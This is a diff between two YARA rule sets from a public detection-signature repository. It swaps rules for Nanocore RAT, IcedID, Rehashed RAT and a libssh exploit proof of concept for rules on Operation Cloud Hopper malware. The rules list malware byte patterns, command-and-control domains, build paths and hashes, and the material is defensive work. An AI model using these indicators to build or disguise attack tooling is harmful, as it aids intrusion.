-		$call_func = {81 ec bc 00 00 00 8d ?? ?? 56 50 6a 00 6a 01 ff ?? ?? e8 ?? ?? ?? ?? 8b f0 83 c4 10 85 f6 0f ?? ?? ?? ?? ?? 33 c9 89 ?? ?? 39 ?? ?? 0f ?? ?? ?? ?? ?? 8b ?? ?? 53 57 8b ?? ?? 8d ?? ?? 0f ?? ?? ?? 8b ?? ?? 8d ?? ?? 8b ?? ?? 03 fa 8b df 2b da 03 ?? ?? 80 ?? ?? 0f ?? ?? ?? ?? ?? 83 ?? ?? ?? 8b c7 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 83 ?? ?? ?? 99 89 ?? ?? 8b ca 89 ?? ?? 8d ?? ?? 99 89 ?? ?? 89 ?? ?? 8d ?? ?? 89 ?? ?? 89 ?? ?? 8b ca 99 89 ?? ?? 89 ?? ?? 8b ca 89 ?? ?? 89 ?? ?? 8d ?? ?? 6a 40 89 ?? ??}
-		$cryp_hex = {8b ec 8b ?? ?? 25 55 55 55 55 d1 e0 8b ?? ?? d1 e9 81 e1 55 55 55 55 0b c1 89 ?? ?? 8b ?? ?? 81 e2 33 33 33 33 c1 e2 02 8b ?? ?? c1 e8 02 25 33 33 33 33 0b d0 89 ?? ?? 8b ?? ?? 81 e1 0f 0f 0f 0f c1 e1 04 8b ?? ?? c1 ea 04 81 e2 0f 0f 0f 0f 0b ca 89 ?? ?? 8b ?? ?? c1 e0 18 8b ?? ?? 81 e1 00 ff 00 00 c1 e1 08 0b c1 8b ?? ?? c1 ea 08 81 e2 00 ff 00 00 0b c2 8b ?? ?? c1 e9 18 0b c1 89 ?? ?? 8b ?? ?? 5d c3}
+		$s1 = "{\\version2}{\\edmins0}{\\nofpages1}{\\nofwords11}{\\nofchars69}{\\*\\company google}{\\nofcharsws79}{\\vern24611}{\\*\\password" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 2 of them or all of them
+		( uint16( 0 ) == 0x5c7b and filesize < 700KB and all of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Gen_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_4 : FILE
 {
 	meta:
-		description = "Detetcs the Nanocore RAT and similar malware"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b007e0ce-e64f-5027-95ff-d178383e3b59"
-		date = "2016-04-22"
-		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L8-L26"
+		id = "ebc810e6-f549-5401-9ee9-331888eda127"
+		date = "2017-04-03"
+		modified = "2023-01-06"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L96-L112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "09fab3ef1b4ca9092fd69fb09c4ef759946fcb5b84161441bff797bb4009ed00"
-		score = 70
+		logic_hash = "7b39531e4af93ab026381a1114efe00fa01fb45860ddb512dbfa436471644e20"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e707a7745e346c5df59b5aa4df084574ae7c204f4fb7f924c0586ae03b79bf06"
+		hash1 = "ae6b45a92384f6e43672e617c53a44225e2944d66c1ffb074694526386074145"
 
 	strings:
-		$x1 = "C:\\Users\\Logintech\\Dropbox\\Projects\\New folder\\Latest\\Benchmark\\Benchmark\\obj\\Release\\Benchmark.pdb" fullword ascii
-		$x2 = "RunPE1" fullword ascii
-		$x3 = "082B8C7D3F9105DC66A7E3267C9750CF43E9D325" fullword ascii
-		$x4 = "$374e0775-e893-4e72-806c-a8d880a49ae7" fullword ascii
-		$x5 = "Monitorinjection" fullword ascii
+		$s6 = "operator \"\" " fullword ascii
+		$s9 = "InvokeMainViaCRT" fullword ascii
+		$s10 = ".?AVAES@@" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of them ) ) or ( 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Gen_2 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_5 : FILE
 {
 	meta:
-		description = "Detetcs the Nanocore RAT"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "74124961-3b0e-5808-b495-90437d3a5999"
-		date = "2016-04-22"
+		id = "1ad189f8-a4c2-5f56-beec-a55bd516ad8d"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L28-L44"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L114-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23b3d149012fb8395b7daa2ecaf3ee66fdeac352ac94d632d76e52df2c6e8ea6"
-		score = 100
+		logic_hash = "9b91ac8f450843c7c85e8d056218aff671bb0f345d16a7ba3f4180ac008bf318"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050"
+		hash1 = "beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01"
 
 	strings:
-		$x1 = "NanoCore.ClientPluginHost" fullword ascii
-		$x2 = "IClientNetworkHost" fullword ascii
-		$x3 = "#=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe" fullword ascii
+		$x1 = "CWINDOWSSYSTEMROOT" fullword ascii
+		$x2 = "YJ_D_KROPOX_M_NUJI_OLY_S_JU_MOOK" fullword ascii
+		$x3 = "NJK_JK_SED_PNJHGFUUGIOO_PIY" fullword ascii
+		$x4 = "c_VDGQBUl}YSB_C_VDlqSDYFU" fullword ascii
+		$s7 = "FALLINLOVE" fullword ascii
+		$op1 = { 83 ec 60 8d 4c 24 00 e8 6f ff ff ff 8d 4c 24 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Sample_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_6 : FILE
 {
 	meta:
-		description = "Detetcs a certain Nanocore RAT sample"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "381d3caf-77de-544c-869c-4d9f0cae148f"
-		date = "2016-04-22"
+		id = "b7578cbd-0f41-5dec-86f6-5792c305a182"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L46-L62"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L136-L152"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c74e5fe7e9d4dd7f032281b0e617f2355bc5844acf04a8ffbfd42165c7d9b8e4"
+		logic_hash = "f165912001c5e2eb48cef46df12220f7f7a53e908a6af571bb4932c50e355388"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash2 = "b7cfc7e9551b15319c068aae966f8a9ff563b522ed9b1b42d19c122778e018c8"
+		hash1 = "aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6"
 
 	strings:
-		$x1 = "TbSiaEdJTf9m1uTnpjS.n9n9M7dZ7FH9JsBARgK" fullword wide
-		$x2 = "1EF0D55861681D4D208EC3070B720C21D885CB35" fullword ascii
-		$x3 = "popthatkitty.Resources.resources" fullword ascii
+		$s1 = "YDNCCOVZKXGRVQPOBRNXXQVNQYXBBCONCOQEGYELIRBEYOVODGXCOXTHXPCXNGUCHRVWKKZSYQMAOWWGHRSPRGSEUWYMEFZHRTHO" fullword ascii
+		$s2 = "psychiatry.dat" fullword ascii
+		$s3 = "meekness.lnk" fullword ascii
+		$s4 = "SOFTWARE\\EGGORG" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Sample_2 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_7 : FILE
 {
 	meta:
-		description = "Detetcs a certain Nanocore RAT sample"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "81f6771a-29a3-5fa0-8d24-ea717d3c5251"
-		date = "2016-04-22"
+		id = "8d32e379-c902-5330-84f5-693a7649a2e4"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L64-L80"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L154-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "505176b7320e95c652f0b6fdc6fadc3d16ff30115263862ba61209fa2fb82a2d"
+		logic_hash = "01993e785fb7d5de9ea629d31725e86fa169b70dcde9716a5da0b646ac88864a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51142d1fb6c080b3b754a92e8f5826295f5da316ec72b480967cbd68432cede1"
+		hash1 = "44a7bea8a08f4c2feb74c6a00ff1114ba251f3dc6922ea5ffab9e749c98cbdce"
 
 	strings:
-		$s1 = "U4tSOtmpM" fullword ascii
-		$s2 = ")U71UDAU_QU_YU_aU_iU_qU_yU_" wide
-		$s3 = "Cy4tOtTmpMtTHVFOrR" fullword ascii
+		$x1 = "jepsjepsjepsjepsjepsjepsjepsjepsjepsjeps" fullword ascii
+		$x2 = "extOextOextOextO" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Feb18_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_8 : FILE
 {
 	meta:
-		description = "Detects Nanocore RAT"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6db0c8a7-8c31-58a6-8732-de6663fec16b"
-		date = "2018-02-19"
+		id = "5e0a09e3-732a-5a90-9d4a-11eae2aa4cc4"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "Internal Research - T2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L92-L115"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L170-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "824fd7304fb298ced69811078aa2dd23d7116554cffb8b6e4b690fccc93a4caf"
+		logic_hash = "a27b041a1ff0fae3d06d8050fe3207435cb84f421099dc1cad8f8a503e976860"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c"
+		hash1 = "19aa5019f3c00211182b2a80dd9675721dac7cfb31d174436d3b8ec9f97d898b"
+		hash2 = "5cebc133ae3b6afee27beb7d3cdb5f3d675c3f12b7204531f453e99acdaa87b1"
 
 	strings:
-		$x1 = "NanoCore Client.exe" fullword ascii
-		$x2 = "NanoCore.ClientPluginHost" fullword ascii
-		$s1 = "PluginCommand" fullword ascii
-		$s2 = "FileCommand" fullword ascii
-		$s3 = "PipeExists" fullword ascii
-		$s4 = "PipeCreated" fullword ascii
-		$s5 = "IClientLoggingHost" fullword ascii
+		$s1 = "WSHELL32.dll" fullword wide
+		$s2 = "operator \"\" " fullword ascii
+		$s3 = "\" /t REG_SZ /d \"" fullword wide
+		$s4 = " /f /v \"" fullword wide
+		$s5 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s6 = "AFX_DIALOG_LAYOUT" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( 1 of ( $x* ) or 5 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and 4 of them )
 }
-rule SIGNATURE_BASE_Nanocore_RAT_Feb18_2 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_9 : FILE
 {
 	meta:
-		description = "Detects Nanocore RAT"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "83a8ad4d-0bef-5ba2-aa10-eac5601f2c7b"
-		date = "2018-02-19"
+		id = "5a02f2ac-905d-550a-bde0-cfde6ed1a4ab"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "Internal Research - T2T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nanocore_rat.yar#L117-L137"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L191-L205"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c104e431a4ecc0d18d7eb74e7a55d32bf8978ee922637d48f3f6a9466a0f5b1a"
+		logic_hash = "f45159a508ce8ccb5ab57c7347916642f58ab1b6e0a8886ba53e4810ed65c5c1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "377ef8febfd8df1a57a7966043ff0c7b8f3973c2cf666136e6c04080bbf9881a"
+		hash1 = "f0002b912135bcee83f901715002514fdc89b5b8ed7585e07e482331e4a56c06"
 
 	strings:
-		$s1 = "ResManagerRunnable" fullword ascii
-		$s2 = "TransformRunnable" fullword ascii
-		$s3 = "MethodInfoRunnable" fullword ascii
-		$s4 = "ResRunnable" fullword ascii
-		$s5 = "RunRunnable" fullword ascii
-		$s6 = "AsmRunnable" fullword ascii
-		$s7 = "ReadRunnable" fullword ascii
-		$s8 = "ExitRunnable" fullword ascii
+		$s1 = "MsMpEng.exe" fullword ascii
+		$op0 = { 2b c7 50 e8 22 83 ff ff ff b6 c0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_Icedid_GZIP_LDR_202104 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_10 : FILE
 {
 	meta:
-		description = "2021 initial Bokbot / Icedid loader for fake GZIP payloads"
-		author = "Thomas Barabosch, Telekom Security"
-		id = "fbf578e7-c318-5f67-82df-f93232362a23"
-		date = "2021-04-12"
-		modified = "2023-01-27"
-		reference = "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_icedid.yar#L14-L40"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a5d3237e-d6db-54ba-bfa6-f642f8096819"
+		date = "2017-04-03"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L207-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7a7cc6c7dcbf43bace6a1f259af38560327c34386517e719ad81068b2d9b6659"
+		logic_hash = "538754e6daadd3efa3e77723dce7143fecad28cf94caa1b29a2d45df44b14ee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5b4028728d8011a2003b7ce6b9ec663dd6a60b7adcc20e2125da318e2d9e13f4"
 
 	strings:
-		$internal_name = "loader_dll_64.dll" fullword
-		$string0 = "_gat=" wide
-		$string1 = "_ga=" wide
-		$string2 = "_gid=" wide
-		$string4 = "_io=" wide
-		$string5 = "GetAdaptersInfo" fullword
-		$string6 = "WINHTTP.dll" fullword
-		$string7 = "DllRegisterServer" fullword
-		$string8 = "PluginInit" fullword
-		$string9 = "POST" wide fullword
-		$string10 = "aws.amazon.com" wide fullword
+		$x1 = "bakshell.EXE" fullword wide
+		$s19 = "bakshell Applicazione MFC" fullword wide
+		$op0 = { 83 c4 34 c3 57 8b ce e8 92 18 00 00 68 20 70 40 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( $internal_name or all of ( $s* ) ) or all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-
-rule SIGNATURE_BASE_Rehashed_RAT_1 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_11 : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Detects malware from Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "24536421-3f8f-58f3-8245-06c519d7a21a"
-		date = "2017-09-08"
+		id = "18bd2fa9-7eca-5dbc-8e79-953800d5bb0a"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L13-L39"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "06a98e87d931bdea697a2cf3de604f03654f9aa2b3f2346e78ba92e492c0fc7c"
+		logic_hash = "7935d3aeef0d4c94a00dd44942a1ba97d0c9fce848914ebc9c59d9f8e9f51599"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "37bd97779e854ea2fc43486ddb831a5acfd19cf89f06823c9fd3b20134cb1c35"
+		hash1 = "a80f6c57f772f20d63021c8971a280c19e8eafe7cc7088344c598d84026dda15"
 
 	strings:
-		$x1 = "C:\\Users\\hoogle168\\Desktop\\"
-		$x2 = "\\NewCoreCtrl08\\Release\\NewCoreCtrl08.pdb" ascii
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729" ascii
-		$s2 = "NewCoreCtrl08.dll" fullword ascii
-		$s3 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
-		$s4 = "http://%s:%d/%s%s%s%s" fullword ascii
-		$s5 = "MyTmpFile.Dat" fullword wide
-		$s6 = "root\\%s" fullword wide
+		$x1 = "IOGVWDWCXZVRHTE" fullword ascii
+		$op1 = { c9 c3 56 6a 00 8b f1 6a 64 e8 dd 34 00 00 c7 06 }
+		$op2 = { 68 38 00 41 00 68 34 00 41 00 e8 d3 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 800KB and ( pe.imphash ( ) == "893212784d01f11aed9ebb42ad2561fc" or pe.exports ( "ProcessTrans" ) or ( 1 of ( $x* ) or 4 of them ) ) ) or ( all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-
-rule SIGNATURE_BASE_Rehashed_RAT_2 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Lockdown : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Tools related to Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcf82155-10da-56b7-879b-841c4ae5023b"
-		date = "2017-09-08"
+		id = "0500f19c-597b-5904-8401-35236215ff29"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L41-L67"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L251-L265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "96c4582981792eb5f8180c06a5fe824fd439cfa0ede294eccff3afa7d318a6e9"
+		logic_hash = "3f24c08817bc94bb4b7d09d51bed62f43952f2c66338f29c4bc8e9000b3ff78a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966"
+		hash1 = "8ca61cef74573d9c1d19b8191c23cbd2b7a1195a74eaba037377e5ee232b1dc5"
 
 	strings:
-		$x1 = "dalat.dulichovietnam.net" fullword ascii
-		$x2 = "web.Thoitietvietnam.org" fullword ascii
-		$a1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64)" fullword ascii
-		$a2 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3" ascii
-		$s1 = "GET /%s%s%s%s HTTP/1.1" fullword ascii
-		$s2 = "http://%s:%d/%s%s%s%s" fullword ascii
-		$s3 = "{521338B8-3378-58F7-AFB9-E7D35E683BF8}" fullword ascii
+		$s1 = "lockdown.dll" fullword ascii
+		$s3 = "mfeann.exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "9c4c648f4a758cbbfe28c8850d82f931" or ( 1 of ( $x* ) or 3 of them ) ) ) or ( 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Rehashed_RAT_3 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Windowxarbot : FILE
 {
 	meta:
-		description = "Detects malware from Rehashed RAT incident"
+		description = "Malware related to Operation Cloud Hopper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "59871be1-295f-54ee-ab4d-4f9e5fdc2935"
-		date = "2017-09-08"
-		modified = "2022-12-21"
-		reference = "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rehashed_rat.yar#L69-L85"
+		id = "4434632a-1886-5e8b-a205-12220263980a"
+		date = "2017-04-07"
+		modified = "2023-12-05"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L267-L279"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46f21f11959f863c85a1cfac74a28ba86d5b9789fea5a428168d157c13cce022"
+		logic_hash = "5d8a9c25032c5371e843f8e80884e43a64c73b1644605b39b2dff11104c3bbcd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9cebae97a067cd7c2be50d7fd8afe5e9cf935c11914a1ab5ff59e91c1e7e5fc4"
 
 	strings:
-		$x1 = "\\BisonNewHNStubDll\\Release\\Goopdate.pdb" ascii
-		$s2 = "psisrndrx.ebd" fullword wide
-		$s3 = "pbad exception" fullword ascii
+		$s1 = "\\Release\\WindowXarbot.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) or 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_EXPL_POC_Libssh_Auth_Bypass_CVE_2023_2283_Jun23_1 : CVE_2023_2283 FILE
+rule SIGNATURE_BASE_Opcloudhopper_Wmidll_Inmemory
 {
 	meta:
-		description = "Detects POC code used in attacks against libssh vulnerability CVE-2023-2283"
-		author = "Florian Roth"
-		id = "e72eba33-686f-5fca-bca3-2b875d1ec224"
-		date = "2023-06-08"
+		description = "Malware related to Operation Cloud Hopper - Page 25"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0afb6e52-bc9a-5a68-890b-79a017e5d554"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_libssh_cve_2023_2283_jun23.yar#L2-L15"
+		reference = "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L281-L293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4c3d54d7f4902c1da664e41096b5931e6534aaaf63243f12e05b81af63d8b28f"
-		score = 85
+		logic_hash = "6dddda4e519eeaa67eb4c21151cab10553420a23a077751e0fc45fcae0bf6e69"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-2283, FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "nprocs = %d" ascii fullword
-		$s2 = "fork failed: %s" ascii fullword
+		$s1 = "wmi.dll 2>&1" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core_PDF : FILE
+rule SIGNATURE_BASE_VBS_Wmiexec_Tool_Apr17_1 : FILE
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
-		author = "Symantec Security Response"
-		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
-		date = "2015-01-22"
+		description = "Tools related to Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8175eb74-38f1-5d8f-a668-aa8e215b032e"
+		date = "2017-04-07"
 		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_waterbug.yar#L3-L15"
+		reference = "https://github.com/maaaaz/impacket-examples-windows"
